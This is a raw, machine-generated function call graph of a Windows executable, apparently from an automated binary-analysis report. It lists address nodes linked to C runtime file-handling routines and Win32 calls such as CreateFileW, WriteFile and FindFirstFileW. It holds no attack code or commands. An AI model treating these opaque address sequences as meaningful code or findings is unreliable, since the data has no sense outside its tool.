76873a 98937->98939 98940 768049 98938->98940 98939->98927 98941 758ca8 __fseek_nolock 58 API calls 98940->98941 98942 768056 98941->98942 98945 758f36 __write_nolock 9 API calls 98942->98945 98943 768125 98946 758c74 __write_nolock 58 API calls 98943->98946 98944->98943 98951 768103 98944->98951 98947 768060 98945->98947 98948 76812a 98946->98948 98947->98927 98949 758ca8 __fseek_nolock 58 API calls 98948->98949 98950 768137 98949->98950 98952 758f36 __write_nolock 9 API calls 98950->98952 98953 75d414 __alloc_osfhnd 61 API calls 98951->98953 98952->98978 98954 7681d1 98953->98954 98955 7681fe 98954->98955 98956 7681db 98954->98956 98958 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98955->98958 98957 758c74 __write_nolock 58 API calls 98956->98957 98959 7681e0 98957->98959 98969 768220 98958->98969 98960 758ca8 __fseek_nolock 58 API calls 98959->98960 98962 7681ea 98960->98962 98961 76829e GetFileType 98963 7682eb 98961->98963 98964 7682a9 GetLastError 98961->98964 98967 758ca8 __fseek_nolock 58 API calls 98962->98967 98972 75d6aa __set_osfhnd 59 API calls 98963->98972 98968 758c87 __dosmaperr 58 API calls 98964->98968 98965 76826c GetLastError 98966 758c87 __dosmaperr 58 API calls 98965->98966 98973 768291 98966->98973 98967->98947 98970 7682d0 CloseHandle 98968->98970 98969->98961 98969->98965 98971 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98969->98971 98970->98973 98974 7682de 98970->98974 98975 768261 98971->98975 98981 768309 98972->98981 98976 758ca8 __fseek_nolock 58 API calls 98973->98976 98977 758ca8 __fseek_nolock 58 API calls 98974->98977 98975->98961 98975->98965 98976->98978 98979 7682e3 98977->98979 98978->98933 98979->98973 98980 7684c4 98980->98978 98983 768697 CloseHandle 98980->98983 98981->98980 98982 761a41 __lseeki64_nolock 60 API calls 98981->98982 98997 76838a 98981->98997 98984 768373 98982->98984 98985 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98983->98985 98987 758c74 __write_nolock 58 API calls 98984->98987 99005 768392 98984->99005 98986 7686be 98985->98986 98988 7686c6 GetLastError 98986->98988 98989 76854e 98986->98989 98987->98997 98990 758c87 __dosmaperr 58 API calls 98988->98990 98989->98978 98991 7686d2 98990->98991 98995 75d5bd __free_osfhnd 59 API calls 98991->98995 98992 760fdb 70 API calls __read_nolock 98992->99005 98993 760c5d __close_nolock 61 API calls 98993->99005 98994 769922 __chsize_nolock 82 API calls 98994->99005 98995->98989 98996 75da06 __write 78 API calls 98996->98997 98997->98980 98997->98996 99000 761a41 60 API calls __lseeki64_nolock 98997->99000 98997->99005 98998 768541 99001 760c5d __close_nolock 61 API calls 98998->99001 98999 76852a 98999->98980 99000->98997 99002 768548 99001->99002 99004 758ca8 __fseek_nolock 58 API calls 99002->99004 99003 761a41 60 API calls __lseeki64_nolock 99003->99005 99004->98989 99005->98992 99005->98993 99005->98994 99005->98997 99005->98998 99005->98999 99005->99003 99006->98923 99007->98929 99008->98929 99010 734ce1 99009->99010 99011 734d9d LoadLibraryA 99009->99011 99010->98809 99010->98812 99011->99010 99012 734dae GetProcAddress 99011->99012 99012->99010 99014 750f36 Mailbox 59 API calls 99013->99014 99015 7353a0 99014->99015 99015->98817 99017 735003 FindResourceExW 99016->99017 99018 735020 99016->99018 99017->99018 99019 76dc8c LoadResource 99017->99019 99018->98818 99019->99018 99020 76dca1 SizeofResource 99019->99020 99020->99018 99021 76dcb5 LockResource 99020->99021 99021->99018 99023 76dd04 99022->99023 99024 735054 99022->99024 99028 7559bd 99024->99028 99026 735062 99026->98829 99027->98818 99029 7559c9 __initptd 99028->99029 99030 7559db 99029->99030 99032 755a01 99029->99032 99041 758ca8 58 API calls __getptd_noexit 99030->99041 99043 756d8e 99032->99043 99033 7559e0 99042 758f36 9 API calls __write_nolock 99033->99042 99036 755a07 99049 75592e 83 API calls 4 library calls 99036->99049 99038 755a16 99050 755a38 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99038->99050 99040 7559eb __initptd 99040->99026 99041->99033 99042->99040 99044 756dc0 RtlEnterCriticalSection 99043->99044 99045 756d9e 99043->99045 99048 756db6 99044->99048 99045->99044 99046 756da6 99045->99046 99047 759d8b __lock 58 API calls 99046->99047 99047->99048 99048->99036 99049->99038 99050->99040 99054 75576d 99051->99054 99053 73508e 99053->98837 99055 755779 __initptd 99054->99055 99056 7557bc 99055->99056 99057 75578f _memset 99055->99057 99058 7557b4 __initptd 99055->99058 99059 756d8e __lock_file 59 API calls 99056->99059 99067 758ca8 58 API calls __getptd_noexit 99057->99067 99058->99053 99061 7557c2 99059->99061 99069 75558d 72 API calls 6 library calls 99061->99069 99062 7557a9 99068 758f36 9 API calls __write_nolock 99062->99068 99065 7557d8 99070 7557f6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99065->99070 99067->99062 99068->99058 99069->99065 99070->99058 99074 75537a GetSystemTimeAsFileTime 99071->99074 99073 799017 99073->98839 99075 7553a8 __aulldiv 99074->99075 99075->99073 99077 755ddc __initptd 99076->99077 99078 755e03 99077->99078 99079 755dee 99077->99079 99081 756d8e __lock_file 59 API calls 99078->99081 99090 758ca8 58 API calls __getptd_noexit 99079->99090 99083 755e09 99081->99083 99082 755df3 99091 758f36 9 API calls __write_nolock 99082->99091 99092 755a40 67 API calls 4 library calls 99083->99092 99086 755e14 99093 755e34 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99086->99093 99088 755e26 99089 755dfe __initptd 99088->99089 99089->98844 99090->99082 99091->99089 99092->99086 99093->99088 99094->98712 99095->98720 99096->98733 99097->98735 99098->98732 99099->98740 99100->98741 99102 7997f1 __tzset_nolock _wcscmp 99101->99102 99103 799685 99102->99103 99104 73506b 74 API calls 99102->99104 99105 7991b2 GetSystemTimeAsFileTime 99102->99105 99106 735045 85 API calls 99102->99106 99103->98751 99103->98779 99104->99102 99105->99102 99106->99102 99107->98778 99109 755522 __initptd 99108->99109 99110 755536 99109->99110 99111 75554e 99109->99111 99137 758ca8 58 API calls __getptd_noexit 99110->99137 99113 756d8e __lock_file 59 API calls 99111->99113 99117 755546 __initptd 99111->99117 99115 755560 99113->99115 99114 75553b 99138 758f36 9 API calls __write_nolock 99114->99138 99121 7554aa 99115->99121 99117->98783 99122 7554cd 99121->99122 99123 7554b9 99121->99123 99126 7554c9 99122->99126 99140 754bad 99122->99140 99183 758ca8 58 API calls __getptd_noexit 99123->99183 99125 7554be 99184 758f36 9 API calls __write_nolock 99125->99184 99139 755585 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99126->99139 99133 7554e7 99157 760b82 99133->99157 99135 7554ed 99135->99126 99136 752ed5 _free 58 API calls 99135->99136 99136->99126 99137->99114 99138->99117 99139->99117 99141 754bc0 99140->99141 99142 754be4 99140->99142 99141->99142 99143 754856 __fseek_nolock 58 API calls 99141->99143 99146 760cf7 99142->99146 99144 754bdd 99143->99144 99185 75da06 99144->99185 99147 760d04 99146->99147 99149 7554e1 99146->99149 99148 752ed5 _free 58 API calls 99147->99148 99147->99149 99148->99149 99150 754856 99149->99150 99151 754875 99150->99151 99152 754860 99150->99152 99151->99133 99320 758ca8 58 API calls __getptd_noexit 99152->99320 99154 754865 99321 758f36 9 API calls __write_nolock 99154->99321 99156 754870 99156->99133 99158 760b8e __initptd 99157->99158 99159 760b9b 99158->99159 99162 760bb2 99158->99162 99337 758c74 58 API calls __getptd_noexit 99159->99337 99161 760c3d 99342 758c74 58 API calls __getptd_noexit 99161->99342 99162->99161 99164 760bc2 99162->99164 99163 760ba0 99338 758ca8 58 API calls __getptd_noexit 99163->99338 99167 760be0 99164->99167 99168 760bea 99164->99168 99339 758c74 58 API calls __getptd_noexit 99167->99339 99171 75d386 ___lock_fhandle 59 API calls 99168->99171 99169 760be5 99343 758ca8 58 API calls __getptd_noexit 99169->99343 99173 760bf0 99171->99173 99175 760c03 99173->99175 99176 760c0e 99173->99176 99174 760c49 99344 758f36 9 API calls __write_nolock 99174->99344 99322 760c5d 99175->99322 99340 758ca8 58 API calls __getptd_noexit 99176->99340 99180 760ba7 __initptd 99180->99135 99181 760c09 99341 760c35 RtlLeaveCriticalSection __unlock_fhandle 99181->99341 99183->99125 99184->99126 99186 75da12 __initptd 99185->99186 99187 75da36 99186->99187 99188 75da1f 99186->99188 99190 75dad5 99187->99190 99191 75da4a 99187->99191 99286 758c74 58 API calls __getptd_noexit 99188->99286 99292 758c74 58 API calls __getptd_noexit 99190->99292 99194 75da72 99191->99194 99195 75da68 99191->99195 99193 75da24 99287 758ca8 58 API calls __getptd_noexit 99193->99287 99213 75d386 99194->99213 99288 758c74 58 API calls __getptd_noexit 99195->99288 99199 75da6d 99293 758ca8 58 API calls __getptd_noexit 99199->99293 99200 75da78 99202 75da9e 99200->99202 99203 75da8b 99200->99203 99289 758ca8 58 API calls __getptd_noexit 99202->99289 99222 75daf5 99203->99222 99204 75dae1 99294 758f36 9 API calls __write_nolock 99204->99294 99208 75da2b __initptd 99208->99142 99209 75da97 99291 75dacd RtlLeaveCriticalSection __unlock_fhandle 99209->99291 99210 75daa3 99290 758c74 58 API calls __getptd_noexit 99210->99290 99214 75d392 __initptd 99213->99214 99215 75d3e1 RtlEnterCriticalSection 99214->99215 99216 759d8b __lock 58 API calls 99214->99216 99217 75d407 __initptd 99215->99217 99218 75d3b7 99216->99218 99217->99200 99219 75d3cf 99218->99219 99295 759fab InitializeCriticalSectionAndSpinCount 99218->99295 99296 75d40b RtlLeaveCriticalSection _doexit 99219->99296 99223 75db02 __write_nolock 99222->99223 99224 75db41 99223->99224 99225 75db60 99223->99225 99256 75db36 99223->99256 99306 758c74 58 API calls __getptd_noexit 99224->99306 99230 75dbb8 99225->99230 99231 75db9c 99225->99231 99226 75c776 __write_nolock 6 API calls 99228 75e356 99226->99228 99228->99209 99229 75db46 99307 758ca8 58 API calls __getptd_noexit 99229->99307 99234 75dbd1 99230->99234 99312 761a41 60 API calls 3 library calls 99230->99312 99309 758c74 58 API calls __getptd_noexit 99231->99309 99297 765deb 99234->99297 99235 75dba1 99310 758ca8 58 API calls __getptd_noexit 99235->99310 99236 75db4d 99308 758f36 9 API calls __write_nolock 99236->99308 99241 75dbdf 99243 75df38 99241->99243 99313 759b2c 58 API calls 2 library calls 99241->99313 99242 75dba8 99311 758f36 9 API calls __write_nolock 99242->99311 99244 75df56 99243->99244 99245 75e2cb WriteFile 99243->99245 99248 75e07a 99244->99248 99254 75df6c 99244->99254 99249 75df2b GetLastError 99245->99249 99258 75def8 99245->99258 99259 75e16f 99248->99259 99261 75e085 99248->99261 99249->99258 99250 75dc0b GetConsoleMode 99250->99243 99252 75dc4a 99250->99252 99251 75e304 99251->99256 99318 758ca8 58 API calls __getptd_noexit 99251->99318 99252->99243 99253 75dc5a GetConsoleCP 99252->99253 99253->99251 99280 75dc89 99253->99280 99254->99251 99255 75dfdb WriteFile 99254->99255 99255->99249 99260 75e018 99255->99260 99256->99226 99258->99251 99258->99256 99263 75e058 99258->99263 99259->99251 99266 75e1e4 WideCharToMultiByte 99259->99266 99260->99254 99267 75e03c 99260->99267 99261->99251 99268 75e0ea WriteFile 99261->99268 99262 75e332 99319 758c74 58 API calls __getptd_noexit 99262->99319 99264 75e063 99263->99264 99265 75e2fb 99263->99265 99315 758ca8 58 API calls __getptd_noexit 99264->99315 99317 758c87 58 API calls 3 library calls 99265->99317 99266->99249 99279 75e22b 99266->99279 99267->99258 99268->99249 99272 75e139 99268->99272 99272->99258 99272->99261 99272->99267 99273 75e068 99316 758c74 58 API calls __getptd_noexit 99273->99316 99274 75e233 WriteFile 99277 75e286 GetLastError 99274->99277 99274->99279 99277->99279 99278 76643a 60 API calls __write_nolock 99278->99280 99279->99258 99279->99259 99279->99267 99279->99274 99280->99258 99280->99278 99281 75dd72 WideCharToMultiByte 99280->99281 99284 75dddf 99280->99284 99314 753775 58 API calls __isleadbyte_l 99280->99314 99281->99258 99282 75ddad WriteFile 99281->99282 99282->99249 99282->99284 99283 767bde WriteConsoleW CreateFileW __putwch_nolock 99283->99284 99284->99249 99284->99258 99284->99280 99284->99283 99285 75de07 WriteFile 99284->99285 99285->99249 99285->99284 99286->99193 99287->99208 99288->99199 99289->99210 99290->99209 99291->99208 99292->99199 99293->99204 99294->99208 99295->99219 99296->99215 99298 765df6 99297->99298 99299 765e03 99297->99299 99300 758ca8 __fseek_nolock 58 API calls 99298->99300 99301 758ca8 __fseek_nolock 58 API calls 99299->99301 99303 765e0f 99299->99303 99302 765dfb 99300->99302 99304 765e30 99301->99304 99302->99241 99303->99241 99305 758f36 __write_nolock 9 API calls 99304->99305 99305->99302 99306->99229 99307->99236 99308->99256 99309->99235 99310->99242 99311->99256 99312->99234 99313->99250 99314->99280 99315->99273 99316->99256 99317->99256 99318->99262 99319->99256 99320->99154 99321->99156 99345 75d643 99322->99345 99324 760cc1 99358 75d5bd 59 API calls 2 library calls 99324->99358 99326 760c6b 99326->99324 99327 760c9f 99326->99327 99330 75d643 __lseek_nolock 58 API calls 99326->99330 99327->99324 99328 75d643 __lseek_nolock 58 API calls 99327->99328 99331 760cab CloseHandle 99328->99331 99329 760cc9 99332 760ceb 99329->99332 99359 758c87 58 API calls 3 library calls 99329->99359 99333 760c96 99330->99333 99331->99324 99334 760cb7 GetLastError 99331->99334 99332->99181 99336 75d643 __lseek_nolock 58 API calls 99333->99336 99334->99324 99336->99327 99337->99163 99338->99180 99339->99169 99340->99181 99341->99180 99342->99169 99343->99174 99344->99180 99346 75d663 99345->99346 99347 75d64e 99345->99347 99351 75d688 99346->99351 99362 758c74 58 API calls __getptd_noexit 99346->99362 99360 758c74 58 API calls __getptd_noexit 99347->99360 99350 75d653 99361 758ca8 58 API calls __getptd_noexit 99350->99361 99351->99326 99352 75d692 99363 758ca8 58 API calls __getptd_noexit 99352->99363 99355 75d65b 99355->99326 99356 75d69a 99364 758f36 9 API calls __write_nolock 99356->99364 99358->99329 99359->99332 99360->99350 99361->99355 99362->99352 99363->99356 99364->99355 99427 761ac0 99365->99427 99368 7348f7 99429 737eec 99368->99429 99369 7348da 99370 737d2c 59 API calls 99369->99370 99372 7348e6 99370->99372 99373 737886 59 API calls 99372->99373 99374 7348f2 99373->99374 99375 750911 99374->99375 99376 761ac0 __write_nolock 99375->99376 99377 75091e GetLongPathNameW 99376->99377 99378 737d2c 59 API calls 99377->99378 99379 73741d 99378->99379 99380 73716b 99379->99380 99381 7377c7 59 API calls 99380->99381 99382 73717d 99381->99382 99383 7348ae 60 API calls 99382->99383 99384 737188 99383->99384 99385 737193 99384->99385 99389 76ebde 99384->99389 99387 733f84 59 API calls 99385->99387 99388 73719f 99387->99388 99433 7334c2 99388->99433 99390 76ebf8 99389->99390 99439 737a68 61 API calls 99389->99439 99392 7371b2 Mailbox 99392->98541 99394 734f3d 136 API calls 99393->99394 99395 7369ef 99394->99395 99396 76e38a 99395->99396 99398 734f3d 136 API calls 99395->99398 99397 799604 122 API calls 99396->99397 99399 76e39f 99397->99399 99400 736a03 99398->99400 99401 76e3a3 99399->99401 99402 76e3c0 99399->99402 99400->99396 99403 736a0b 99400->99403 99404 734faa 84 API calls 99401->99404 99405 750f36 Mailbox 59 API calls 99402->99405 99406 736a17 99403->99406 99407 76e3ab 99403->99407 99404->99407 99426 76e405 Mailbox 99405->99426 99440 736bec 99406->99440 99547 794339 90 API calls _wprintf 99407->99547 99411 76e3b9 99411->99402 99412 76e5b9 99413 752ed5 _free 58 API calls 99412->99413 99414 76e5c1 99413->99414 99415 734faa 84 API calls 99414->99415 99420 76e5ca 99415->99420 99419 752ed5 _free 58 API calls 99419->99420 99420->99419 99421 734faa 84 API calls 99420->99421 99551 78fad2 89 API calls 4 library calls 99420->99551 99421->99420 99423 737f41 59 API calls 99423->99426 99426->99412 99426->99420 99426->99423 99533 73766f 99426->99533 99541 7374bd 99426->99541 99548 78fa6e 59 API calls 2 library calls 99426->99548 99549 78f98f 61 API calls 2 library calls 99426->99549 99550 797428 59 API calls Mailbox 99426->99550 99428 7348bb GetFullPathNameW 99427->99428 99428->99368 99428->99369 99430 737f06 99429->99430 99432 737ef9 99429->99432 99431 750f36 Mailbox 59 API calls 99430->99431 99431->99432 99432->99372 99434 7334d4 99433->99434 99438 7334f3 _memmove 99433->99438 99436 750f36 Mailbox 59 API calls 99434->99436 99435 750f36 Mailbox 59 API calls 99437 73350a 99435->99437 99436->99438 99437->99392 99438->99435 99439->99389 99441 76e777 99440->99441 99442 736c15 99440->99442 99624 78fad2 89 API calls 4 library calls 99441->99624 99557 735906 60 API calls Mailbox 99442->99557 99445 736c37 99558 735956 67 API calls 99445->99558 99446 76e78a 99625 78fad2 89 API calls 4 library calls 99446->99625 99448 736c4c 99448->99446 99450 736c54 99448->99450 99452 7377c7 59 API calls 99450->99452 99451 76e7a6 99454 736cc1 99451->99454 99453 736c60 99452->99453 99559 750ad7 60 API calls __write_nolock 99453->99559 99457 736ccf 99454->99457 99458 76e7b9 99454->99458 99456 736c6c 99459 7377c7 59 API calls 99456->99459 99461 7377c7 59 API calls 99457->99461 99460 735dcf CloseHandle 99458->99460 99462 736c78 99459->99462 99463 76e7c5 99460->99463 99464 736cd8 99461->99464 99465 7348ae 60 API calls 99462->99465 99466 734f3d 136 API calls 99463->99466 99467 7377c7 59 API calls 99464->99467 99468 736c86 99465->99468 99469 76e7e1 99466->99469 99470 736ce1 99467->99470 99560 7359b0 ReadFile SetFilePointerEx 99468->99560 99472 76e80a 99469->99472 99476 799604 122 API calls 99469->99476 99562 7346f9 99470->99562 99626 78fad2 89 API calls 4 library calls 99472->99626 99475 736cb2 99561 735c4e SetFilePointerEx SetFilePointerEx 99475->99561 99481 76e7fd 99476->99481 99477 736cf8 99478 737c8e 59 API calls 99477->99478 99482 736d09 SetCurrentDirectoryW 99478->99482 99479 76e821 99511 736e6c Mailbox 99479->99511 99483 76e826 99481->99483 99484 76e805 99481->99484 99489 736d1c Mailbox 99482->99489 99485 734faa 84 API calls 99483->99485 99486 734faa 84 API calls 99484->99486 99487 76e82b 99485->99487 99486->99472 99488 750f36 Mailbox 59 API calls 99487->99488 99495 76e85f 99488->99495 99491 750f36 Mailbox 59 API calls 99489->99491 99493 736d2f 99491->99493 99492 733bcd 99492->98400 99492->98409 99494 73538e 59 API calls 99493->99494 99522 736d3a Mailbox __NMSG_WRITE 99494->99522 99496 73766f 59 API calls 99495->99496 99517 76e8a8 Mailbox 99496->99517 99497 736e47 99620 735dcf 99497->99620 99500 76ea99 99631 797388 59 API calls Mailbox 99500->99631 99501 736e53 SetCurrentDirectoryW 99501->99511 99504 76eabb 99632 79f656 59 API calls 2 library calls 99504->99632 99507 76eac8 99509 752ed5 _free 58 API calls 99507->99509 99508 76eb32 99635 78fad2 89 API calls 4 library calls 99508->99635 99509->99511 99552 735934 99511->99552 99513 73766f 59 API calls 99513->99517 99514 76eb4b 99514->99497 99516 76eb2a 99634 78f928 59 API calls 4 library calls 99516->99634 99517->99500 99517->99513 99524 737f41 59 API calls 99517->99524 99528 76eaeb 99517->99528 99627 78fa6e 59 API calls 2 library calls 99517->99627 99628 78f98f 61 API calls 2 library calls 99517->99628 99629 797428 59 API calls Mailbox 99517->99629 99630 737373 59 API calls Mailbox 99517->99630 99520 737f41 59 API calls 99520->99522 99522->99497 99522->99508 99522->99516 99522->99520 99613 7359cd 67 API calls _wcscpy 99522->99613 99614 7370bd GetStringTypeW 99522->99614 99615 73702c 60 API calls __wcsnicmp 99522->99615 99616 73710a GetStringTypeW __NMSG_WRITE 99522->99616 99617 7537bd GetStringTypeW _iswctype 99522->99617 99618 736a3c 165 API calls 3 library calls 99522->99618 99619 737373 59 API calls Mailbox 99522->99619 99524->99517 99633 78fad2 89 API calls 4 library calls 99528->99633 99530 76eb04 99531 752ed5 _free 58 API calls 99530->99531 99532 76eb17 99531->99532 99532->99511 99535 73770f 99533->99535 99538 737682 _memmove 99533->99538 99534 750f36 Mailbox 59 API calls 99537 737689 99534->99537 99536 750f36 Mailbox 59 API calls 99535->99536 99536->99538 99539 750f36 Mailbox 59 API calls 99537->99539 99540 7376b2 99537->99540 99538->99534 99539->99540 99540->99426 99542 7374d0 99541->99542 99544 73757e 99541->99544 99543 750f36 Mailbox 59 API calls 99542->99543 99546 737502 99542->99546 99543->99546 99544->99426 99545 750f36 59 API calls Mailbox 99545->99546 99546->99544 99546->99545 99547->99411 99548->99426 99549->99426 99550->99426 99551->99420 99553 735dcf CloseHandle 99552->99553 99554 73593c Mailbox 99553->99554 99555 735dcf CloseHandle 99554->99555 99556 73594b 99555->99556 99556->99492 99557->99445 99558->99448 99559->99456 99560->99475 99561->99454 99563 7377c7 59 API calls 99562->99563 99564 73470f 99563->99564 99565 7377c7 59 API calls 99564->99565 99566 734717 99565->99566 99567 7377c7 59 API calls 99566->99567 99568 73471f 99567->99568 99569 7377c7 59 API calls 99568->99569 99570 734727 99569->99570 99571 73475b 99570->99571 99572 76d82b 99570->99572 99573 7379ab 59 API calls 99571->99573 99574 7381a7 59 API calls 99572->99574 99575 734769 99573->99575 99576 76d834 99574->99576 99577 737e8c 59 API calls 99575->99577 99578 737eec 59 API calls 99576->99578 99579 734773 99577->99579 99581 73479e 99578->99581 99580 7379ab 59 API calls 99579->99580 99579->99581 99583 734794 99580->99583 99584 76d854 99581->99584 99585 7347bd 99581->99585 99599 7347de 99581->99599 99582 7379ab 59 API calls 99586 7347ef 99582->99586 99587 737e8c 59 API calls 99583->99587 99588 76d924 99584->99588 99596 76d90d 99584->99596 99607 76d88b 99584->99607 99589 737b52 59 API calls 99585->99589 99590 734801 99586->99590 99593 7381a7 59 API calls 99586->99593 99587->99581 99591 737d2c 59 API calls 99588->99591 99592 7347c7 99589->99592 99595 7381a7 59 API calls 99590->99595 99598 734811 99590->99598 99608 76d8e1 99591->99608 99594 7379ab 59 API calls 99592->99594 99592->99599 99593->99590 99594->99599 99595->99598 99596->99588 99603 76d8f8 99596->99603 99597 734818 99601 7381a7 59 API calls 99597->99601 99610 73481f Mailbox 99597->99610 99598->99597 99600 7381a7 59 API calls 99598->99600 99599->99582 99600->99597 99601->99610 99602 737b52 59 API calls 99602->99608 99605 737d2c 59 API calls 99603->99605 99604 76d8e9 99606 737d2c 59 API calls 99604->99606 99605->99608 99606->99608 99607->99604 99611 76d8d4 99607->99611 99608->99599 99608->99602 99636 737a84 59 API calls 2 library calls 99608->99636 99610->99477 99612 737d2c 59 API calls 99611->99612 99612->99608 99613->99522 99614->99522 99615->99522 99616->99522 99617->99522 99618->99522 99619->99522 99621 735dd9 99620->99621 99622 735de8 99620->99622 99621->99501 99622->99621 99623 735ded CloseHandle 99622->99623 99623->99621 99624->99446 99625->99451 99626->99479 99627->99517 99628->99517 99629->99517 99630->99517 99631->99504 99632->99507 99633->99530 99634->99508 99635->99514 99636->99608 99638 736ef5 99637->99638 99642 737009 99637->99642 99639 750f36 Mailbox 59 API calls 99638->99639 99638->99642 99641 736f1c 99639->99641 99640 750f36 Mailbox 59 API calls 99646 736f91 99640->99646 99641->99640 99642->98547 99645 7374bd 59 API calls 99645->99646 99646->99642 99646->99645 99647 73766f 59 API calls 99646->99647 99650 7363a0 94 API calls 2 library calls 99646->99650 99651 7868a9 59 API calls Mailbox 99646->99651 99647->99646 99648->98550 99649->98552 99650->99646 99651->99646 99653 7330d2 LoadIconW 99652->99653 99655 733107 99653->99655 99655->98567 99656->98566 99658 73e835 99657->99658 99659 773e02 99658->99659 99661 73e89f 99658->99661 99671 73e8f9 99658->99671 99729 73a000 99659->99729 99665 7377c7 59 API calls 99661->99665 99661->99671 99662 773e17 99686 73ead0 Mailbox 99662->99686 99752 799ed4 89 API calls 4 library calls 99662->99752 99663 7377c7 59 API calls 99663->99671 99666 773e5d 99665->99666 99668 752ec0 __cinit 67 API calls 99666->99668 99667 752ec0 __cinit 67 API calls 99667->99671 99668->99671 99669 773e7f 99669->98643 99670 738620 69 API calls 99670->99686 99671->99663 99671->99667 99671->99669 99673 73eaba 99671->99673 99671->99686 99673->99686 99753 799ed4 89 API calls 4 library calls 99673->99753 99674 73f2f5 99757 799ed4 89 API calls 4 library calls 99674->99757 99675 73a000 341 API calls 99675->99686 99679 77417e 99679->98643 99680 738ea0 59 API calls 99680->99686 99684 799ed4 89 API calls 99684->99686 99686->99670 99686->99674 99686->99675 99686->99680 99686->99684 99687 73ebd8 99686->99687 99728 7380d7 59 API calls 2 library calls 99686->99728 99754 7871e5 59 API calls 99686->99754 99755 7ac6d7 341 API calls 99686->99755 99756 7ab651 341 API calls Mailbox 99686->99756 99758 739df0 59 API calls Mailbox 99686->99758 99759 7a94db 341 API calls Mailbox 99686->99759 99687->98643 99689 73f7b0 99688->99689 99690 73f61a 99688->99690 99691 737f41 59 API calls 99689->99691 99692 774777 99690->99692 99693 73f626 99690->99693 99699 73f6ec Mailbox 99691->99699 99851 7abd80 341 API calls Mailbox 99692->99851 99849 73f3f0 341 API calls 2 library calls 99693->99849 99696 774785 99700 73f790 99696->99700 99852 799ed4 89 API calls 4 library calls 99696->99852 99698 73f65d 99698->99696 99698->99699 99698->99700 99704 7ae037 130 API calls 99699->99704 99766 793c7b 99699->99766 99769 79cc06 99699->99769 99700->98643 99702 73f743 99702->99700 99850 739df0 59 API calls Mailbox 99702->99850 99704->99702 99706->98643 99707->98643 99708->98643 99709->98573 99710->98579 99711->98643 99712->98581 99713->98581 99714->98581 99715->98643 99716->98643 99717->98643 99718->98643 99719->98643 99720->98643 99721->98626 99722->98626 99723->98626 99724->98626 99725->98626 99726->98626 99727->98626 99728->99686 99730 73a01f 99729->99730 99746 73a04d Mailbox 99729->99746 99731 750f36 Mailbox 59 API calls 99730->99731 99731->99746 99732 752ec0 67 API calls __cinit 99732->99746 99733 73b5d5 99734 7381a7 59 API calls 99733->99734 99747 73a1b7 99734->99747 99735 7871e5 59 API calls 99735->99746 99738 750f36 59 API calls Mailbox 99738->99746 99739 7381a7 59 API calls 99739->99746 99741 7703ae 99762 799ed4 89 API calls 4 library calls 99741->99762 99743 7377c7 59 API calls 99743->99746 99745 7703bd 99745->99662 99746->99732 99746->99733 99746->99735 99746->99738 99746->99739 99746->99741 99746->99743 99746->99747 99748 770d2f 99746->99748 99750 73b5da 99746->99750 99751 73a6ba 99746->99751 99760 73ca20 341 API calls 2 library calls 99746->99760 99761 73ba60 60 API calls Mailbox 99746->99761 99747->99662 99764 799ed4 89 API calls 4 library calls 99748->99764 99765 799ed4 89 API calls 4 library calls 99750->99765 99763 799ed4 89 API calls 4 library calls 99751->99763 99752->99686 99753->99686 99754->99686 99755->99686 99756->99686 99757->99679 99758->99686 99759->99686 99760->99746 99761->99746 99762->99745 99763->99747 99764->99750 99765->99747 99853 79449b GetFileAttributesW 99766->99853 99770 7377c7 59 API calls 99769->99770 99771 79cc3b 99770->99771 99772 7377c7 59 API calls 99771->99772 99773 79cc44 99772->99773 99774 79cc58 99773->99774 99966 739c9c 59 API calls 99773->99966 99776 739997 84 API calls 99774->99776 99777 79cc75 99776->99777 99778 79cc97 99777->99778 99779 79cd76 99777->99779 99791 79cda6 Mailbox 99777->99791 99780 739997 84 API calls 99778->99780 99781 734f3d 136 API calls 99779->99781 99782 79cca3 99780->99782 99783 79cd8a 99781->99783 99784 7381a7 59 API calls 99782->99784 99785 79cda2 99783->99785 99788 734f3d 136 API calls 99783->99788 99787 79ccaf 99784->99787 99786 7377c7 59 API calls 99785->99786 99785->99791 99789 79cdd7 99786->99789 99793 79ccc3 99787->99793 99794 79ccf5 99787->99794 99788->99785 99790 7377c7 59 API calls 99789->99790 99792 79cde0 99790->99792 99791->99702 99796 7377c7 59 API calls 99792->99796 99797 7381a7 59 API calls 99793->99797 99795 739997 84 API calls 99794->99795 99798 79cd02 99795->99798 99799 79cde9 99796->99799 99800 79ccd3 99797->99800 99801 7381a7 59 API calls 99798->99801 99802 7377c7 59 API calls 99799->99802 99803 737e0b 59 API calls 99800->99803 99804 79cd0e 99801->99804 99805 79cdf2 99802->99805 99806 79ccdd 99803->99806 99967 794ad8 GetFileAttributesW 99804->99967 99808 739997 84 API calls 99805->99808 99809 739997 84 API calls 99806->99809 99811 79cdff 99808->99811 99812 79cce9 99809->99812 99810 79cd17 99814 79cd2a 99810->99814 99816 737b52 59 API calls 99810->99816 99815 7346f9 59 API calls 99811->99815 99813 737c8e 59 API calls 99812->99813 99813->99794 99818 739997 84 API calls 99814->99818 99823 79cd30 99814->99823 99817 79ce1a 99815->99817 99816->99814 99820 737b52 59 API calls 99817->99820 99819 79cd57 99818->99819 99968 793833 75 API calls Mailbox 99819->99968 99822 79ce29 99820->99822 99824 79ce5d 99822->99824 99826 737b52 59 API calls 99822->99826 99823->99791 99825 7381a7 59 API calls 99824->99825 99828 79ce6b 99825->99828 99827 79ce3a 99826->99827 99827->99824 99830 737d2c 59 API calls 99827->99830 99829 737c8e 59 API calls 99828->99829 99831 79ce79 99829->99831 99832 79ce4f 99830->99832 99833 737c8e 59 API calls 99831->99833 99834 737d2c 59 API calls 99832->99834 99835 79ce87 99833->99835 99834->99824 99836 737c8e 59 API calls 99835->99836 99837 79ce95 99836->99837 99838 739997 84 API calls 99837->99838 99839 79cea1 99838->99839 99857 7940b2 99839->99857 99841 79ceb2 99842 793c7b 3 API calls 99841->99842 99843 79cebc 99842->99843 99844 739997 84 API calls 99843->99844 99848 79ceed 99843->99848 99845 79ceda 99844->99845 99911 7991fe 99845->99911 99847 734faa 84 API calls 99847->99791 99848->99847 99849->99698 99850->99702 99851->99696 99852->99700 99854 793c82 99853->99854 99855 7944b6 FindFirstFileW 99853->99855 99854->99702 99855->99854 99856 7944cb FindClose 99855->99856 99856->99854 99858 7940ce 99857->99858 99859 7940e1 99858->99859 